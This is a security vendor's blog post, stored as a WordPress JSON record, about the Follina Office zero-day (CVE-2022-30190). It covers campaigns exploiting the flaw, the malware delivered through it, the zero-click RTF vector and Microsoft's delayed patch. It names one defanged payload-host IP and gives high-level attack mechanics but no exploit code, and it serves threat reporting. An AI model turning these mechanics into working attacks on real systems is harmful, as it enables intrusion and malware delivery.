{"id":7266,"date":"2022-08-04T08:43:34","date_gmt":"2022-08-04T08:43:34","guid":{"rendered":"https:\/\/webdev.securin.xyz\/?p=7266"},"modified":"2023-04-20T01:58:27","modified_gmt":"2023-04-20T08:58:27","slug":"follina-the-no-patch-microsoft-office-0-day-bug-cve-2022-30190-springs-in-wild","status":"publish","type":"post","link":"https:\/\/webdev.securin.xyz\/articles\/follina-the-no-patch-microsoft-office-0-day-bug-cve-2022-30190-springs-in-wild\/","title":{"rendered":"Follina: The No Patch Microsoft Office 0-Day Bug [CVE-2022-30190] Springs in Wild"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t

An unpatched vulnerability tracked as CVE-2022-30190 (aka Follina) in the remote Word template feature enables adversaries to execute malicious code on targeted systems of Microsoft Office. TA413, a Chinese state-sponsored threat actor, is now found to be exploiting the Follina Zero-day vulnerability to use it against the International Tibetan community.\u00a0<\/p><\/blockquote>

On May 27, 2022, researchers have publicly disclosed a zero-day vulnerability in Microsoft Office that could be exploited by sending malicious Word documents to a victim’s computer, allowing remote code execution.\u00a0<\/p>

This Follina zero-day was first reported to Microsoft on April 12, 2022,\u00a0 when Word documents impersonated Russia’s Sputnik news agency by offering recipients a radio interview and were discovered exploiting the bug in the wild. However, the researcher who first reported the zero-day stated that Microsoft first classified the hole as \u201cnot a security-related problem\u201d and later notified the researcher that the problem has been resolved, although no patch appears to be available.<\/p>

\u00a0<\/p>

Recent Developments<\/h2>

Yet another malware delivered via Follina:\u00a0<\/strong>New Woody Rat malware is delivered onto victim networks through phishing emails targeting the Follina vulnerability in Microsoft Office documents.<\/p>

Follina now Opens Rozena:<\/strong>\u00a0A newly observed phishing campaign exploits the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor (Rozena) on Windows systems. The Rozena backdoor malware can be used to inject a remote shell connection back to the attacker.<\/p>

The Long Sought Patch:<\/strong> Microsoft finally released fixes to address an actively exploited Windows zero-day vulnerability known as Follina as part of its Patch Tuesday updates.<\/p>

Ukraine CERT Warns:<\/strong> CERT Ukraine warns<\/a> that Sandworm may be exploiting Follina since April 2022. The advisory also stated that Russian hackers launched new campaigns leveraging Follina, sending malignant email messages to over 500 media outlets in Ukraine including radio stations and newspapers. There are a few indicators of compromise provided by CERT-UA that can help defenders detect CrescentImp infections. It is not known what type of malware family CrescentImp belongs to or what its functionality is.<\/p>

\u00a0<\/p>

Government Agencies Targeted<\/h2>

A new series of attacks targeting government agencies in Europe and the United States using the Follina” vulnerability. This campaign posed to be a pay increase and used an RTF with the exploit payload downloaded from 45.76.53[.]253.\u00a0<\/p>

In an interesting twist, Microsoft is now being actively exploited in phishing attacks to infect recipients with Qbot malware,<\/strong> AsyncRAT, and other malware<\/b>. Furthermore, 0patch has released micro patches to help admins secure their systems while the Follina zero-day awaits an official fix since it is actively exploited in phishing attacks targeting, among others, US and EU government agencies.\u00a0<\/p>

Considering the series of attacks, CISA warning, and availability of multiple exploit code, Microsoft should have classified it as critical rather than giving a high severity rating.\u00a0<\/p>

\u00a0<\/p>

The Zero Click Vulnerability {CVE-2022-30190}<\/h2>

Researchers referred to this vulnerability simply as Follina until a tracking number was assigned to it. It has since been assigned CVE-2022-30190.<\/p>

A Rich Text Format (.rtf) file can be used to launch this vulnerability using only the Preview Pane in Windows Explorer. This increases the severity of the threat by making it possible to exploit it with a zero-click trigger rather than a single-click trigger. Furthermore, the triggering payload can communicate with remote locations, which may include NTLM hashes that can be exploited for additional post-exploitation.<\/p>

\u00a0<\/p>

CSW Team delved deep into this Follina vulnerability and found –<\/strong><\/p>